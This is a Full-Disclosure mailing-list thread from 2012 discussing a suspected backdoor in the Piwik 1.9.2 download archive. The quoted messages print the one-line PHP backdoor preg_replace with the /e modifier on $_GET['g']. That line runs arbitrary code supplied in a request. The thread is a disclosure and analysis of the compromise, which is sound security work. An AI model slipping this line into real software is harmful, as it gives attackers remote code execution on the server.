
Date: Tue, 27 Nov 2012 17:59:17 +0100
From: Ferenc Kovacs <tyra3l@...il.com>
To: Max Grobecker <max@...becker-wtal.de>
Cc: full-disclosure <full-disclosure@...ts.grok.org.uk>
Subject: Re: Possible infection of Piwik 1.9.2 download
	archive

on a related note: the /e modifier will be deprecated with php 5.5 and
hopefully removed in the following version
https://wiki.php.net/rfc/remove_preg_replace_eval_modifier


On Tue, Nov 27, 2012 at 1:23 PM, Max Grobecker <max@...becker-wtal.de>wrote:

> Yep, found later that the /e modifier allows you to execute code ;-)
>
>
> Am 27.11.2012 12:54, schrieb Christian Sciberras:
> >> At the moment I'm trying to figure out the further sense of this code,
> >> but it seems that there might also be some kind of backdoor (because of
> >> the use of $_GET).
> >
> >
> > preg_replace("/(.+)/e", $_GET['g'], 'dwm');
> >
> > You think?
> >
> >
> > Chris.
> >
> >
> > On Mon, Nov 26, 2012 at 9:17 PM, Maximilian Grobecker
> > <max@...becker-wtal.de <mailto:max@...becker-wtal.de>> wrote:
> >
> >     preg_replace("/(.+)/e", $_GET['g'], 'dwm');
> >
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
Ferenc Kovács
@Tyr43l - http://tyrael.hu

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
